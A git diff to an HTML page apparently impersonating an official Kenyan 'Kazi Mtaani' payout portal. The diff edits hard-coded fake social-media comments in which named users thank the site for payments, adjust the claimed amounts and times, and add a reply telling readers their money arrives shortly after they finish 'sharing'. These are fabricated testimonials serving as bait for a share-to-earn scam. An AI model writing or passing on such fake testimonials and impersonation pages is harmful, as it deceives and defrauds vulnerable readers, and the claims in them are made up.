--- a/Official-Kazi-Mtaani-Portal.html
+++ b/Official-Kazi-Mtaani-Portal.html
@@ -571,17 +571,22 @@ button:hover {
                 </div>
                 <div class="comment">
                     <img src="https://1.bp.blogspot.com/--d2BBdGugW8/XpdlXRvB-HI/AAAAAAAAAJ8/xcstaPQkWoszaizR_rkK2Nc5L7xN2o7WACLcBGAsYHQ/s1600/FB_IMG_15869726679037399.jpg" />
-                    <div class="single-container"><span class="user">Patrick Kiptoo</span> <span class="text"> I just received 7k wow unbeleivable. thank you sir</span></div>
-                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
+                    <div class="single-container"><span class="user">Patrick Kiptoo</span> <span class="text"> I just received 500 wow unbeleivable. thank you sir</span></div>
+                    <div class="buttons"><span class="time t2">6m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                 </div>
                 <div class="comment reply">
                     <img src="https://1.bp.blogspot.com/-UQW1DxDR9Ko/XpdlghF8wJI/AAAAAAAAAKU/EXuIMhMGNeED6BwLWbxkGgtBe3HL0RTTACLcBGAsYHQ/s1600/FB_IMG_15869730921979436.jpg" />
                     <div class="single-container"><span class="user">Amahle John </span> <span class="text"> My own is pending because i just finish sharing. Please help! </span></div>
+                    <div class="buttons"><span class="time t1">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
+                </div> 
+			<div class="comment reply">
+                    <img src="https://1.bp.blogspot.com/--d2BBdGugW8/XpdlXRvB-HI/AAAAAAAAAJ8/xcstaPQkWoszaizR_rkK2Nc5L7xN2o7WACLcBGAsYHQ/s1600/FB_IMG_15869726679037399.jpg" />
+                    <div class="single-container"><span class="user">Patrick Kiptoo </span> <span class="text"> Mine too about 50 minutes after I finished sharing... just wait for a few minutes after sharing. </span></div>
                     <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                 </div>
                 <div class="comment">
                     <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhETuUnZKp3TrK9zDTqBtlN4ahx1RrCH6RqG14wW5J8CIBv6HYs7gQSvAiZBwn8NT3lXcz3h8jR87s1z_qZ2kzEoZ7HRnWzskSuqK5NOfKyiQByU3BgypGHXP-m9LlPyFh2FhIsUdN6cO1DnZb-GTtRMDQk8L75NDDUnEC4JxQ6OwsnAjbKVhhlNxrLyQ/s320/9F5D4C76-9CCB-45EB-BA73-73A125849593.jpeg" />
-                    <div class="single-container"><span class="user">Bonolo</span> <span class="text">Climate Workx Naija don bless my AZA ooo,I'm so happy</span></div>
+                    <div class="single-container"><span class="user">Bonolo</span> <span class="text">Climate Workx has bless my account just now,I'm so happy</span></div>
                     <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                 </div>
                 <div class="input"><input placeholder="Write a comment..." /></div>
